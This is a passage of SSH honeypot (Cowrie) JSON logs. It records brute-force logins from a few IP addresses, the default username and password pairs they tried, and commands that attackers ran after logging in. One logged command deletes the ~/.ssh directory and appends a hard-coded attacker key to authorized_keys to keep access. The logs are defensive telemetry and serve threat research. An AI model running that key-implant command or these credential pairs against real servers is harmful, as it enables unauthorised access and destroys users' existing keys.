56-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:08:44.564719Z","src_ip":"217.154.1.158","session":"136f21851321"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-26T20:08:44.619141Z","src_ip":"217.154.1.158","session":"136f21851321"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:45.635138Z","src_ip":"217.154.1.158","session":"136f21851321"}
{"eventid":"cowrie.session.connect","src_ip":"31.169.126.45","src_port":60736,"dst_ip":"1.2.3.4","dst_port":22,"session":"485471000c48","protocol":"ssh","message":"New connection: 31.169.126.45:60736 (1.2.3.4:22) [session: 485471000c48]","sensor":"my-vps","timestamp":"2025-08-26T20:08:46.194752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:08:47.562816Z","src_ip":"31.169.126.45","session":"485471000c48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:08:47.564602Z","src_ip":"31.169.126.45","session":"485471000c48"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:08:57.109946Z","src_ip":"31.169.126.45","session":"485471000c48"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60430,"dst_ip":"1.2.3.4","dst_port":22,"session":"9564902cc5a7","protocol":"ssh","message":"New connection: 217.154.1.158:60430 (1.2.3.4:22) [session: 9564902cc5a7]","sensor":"my-vps","timestamp":"2025-08-26T20:09:02.126559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:09:02.127642Z","src_ip":"217.154.1.158","session":"9564902cc5a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:09:02.142393Z","src_ip":"217.154.1.158","session":"9564902cc5a7"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T20:09:02.188410Z","src_ip":"217.154.1.158","session":"9564902cc5a7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:03.204667Z","src_ip":"217.154.1.158","session":"9564902cc5a7"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":33506,"dst_ip":"1.2.3.4","dst_port":22,"session":"066b90a6d10c","protocol":"ssh","message":"New connection: 199.195.248.191:33506 (1.2.3.4:22) [session: 066b90a6d10c]","sensor":"my-vps","timestamp":"2025-08-26T20:09:14.428062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:09:14.439069Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:09:14.524698Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.login.success","username":"root","password":"2025.com","message":"login attempt [root/2025.com] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:09:14.893985Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:09:15.097950Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.098767Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.100282Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.193777Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:09:15.493612Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.494406Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.590489Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.591566Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":34046,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3b1d7b6c41b","protocol":"ssh","message":"New connection: 199.195.248.191:34046 (1.2.3.4:22) [session: e3b1d7b6c41b]","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.675827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.682692Z","src_ip":"199.195.248.191","session":"e3b1d7b6c41b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:09:15.767897Z","src_ip":"199.195.248.191","session":"e3b1d7b6c41b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:09:16.127414Z","src_ip":"199.195.248.191","session":"e3b1d7b6c41b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.224482Z","src_ip":"199.195.248.191","session":"e3b1d7b6c41b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":34632,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd9e38f105b0","protocol":"ssh","message":"New connection: 199.195.248.191:34632 (1.2.3.4:22) [session: fd9e38f105b0]","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.310248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.311316Z","src_ip":"199.195.248.191","session":"fd9e38f105b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.413365Z","src_ip":"199.195.248.191","session":"fd9e38f105b0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.815047Z","src_ip":"199.195.248.191","session":"fd9e38f105b0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.910791Z","src_ip":"199.195.248.191","session":"066b90a6d10c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:17.911860Z","src_ip":"199.195.248.191","session":"fd9e38f105b0"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53238,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b1c7bce8f88","protocol":"ssh","message":"New connection: 217.154.1.158:53238 (1.2.3.4:22) [session: 9b1c7bce8f88]","sensor":"my-vps","timestamp":"2025-08-26T20:09:19.600470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:09:19.601844Z","src_ip":"217.154.1.158","session":"9b1c7bce8f88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:09:19.616370Z","src_ip":"217.154.1.158","session":"9b1c7bce8f88"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:09:19.664845Z","src_ip":"217.154.1.158","session":"9b1c7bce8f88"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:20.681053Z","src_ip":"217.154.1.158","session":"9b1c7bce8f88"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54536,"dst_ip":"1.2.3.4","dst_port":22,"session":"97e833b03a07","protocol":"ssh","message":"New connection: 217.154.1.158:54536 (1.2.3.4:22) [session: 97e833b03a07]","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.056740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.057804Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.071856Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.114892Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:09:37.165147Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.166020Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.182143Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:37.183058Z","src_ip":"217.154.1.158","session":"97e833b03a07"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44562,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f4fb68e111c","protocol":"ssh","message":"New connection: 217.154.1.158:44562 (1.2.3.4:22) [session: 0f4fb68e111c]","sensor":"my-vps","timestamp":"2025-08-26T20:09:54.505499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:09:54.506530Z","src_ip":"217.154.1.158","session":"0f4fb68e111c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:09:54.521087Z","src_ip":"217.154.1.158","session":"0f4fb68e111c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:09:54.564662Z","src_ip":"217.154.1.158","session":"0f4fb68e111c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:09:55.581591Z","src_ip":"217.154.1.158","session":"0f4fb68e111c"}
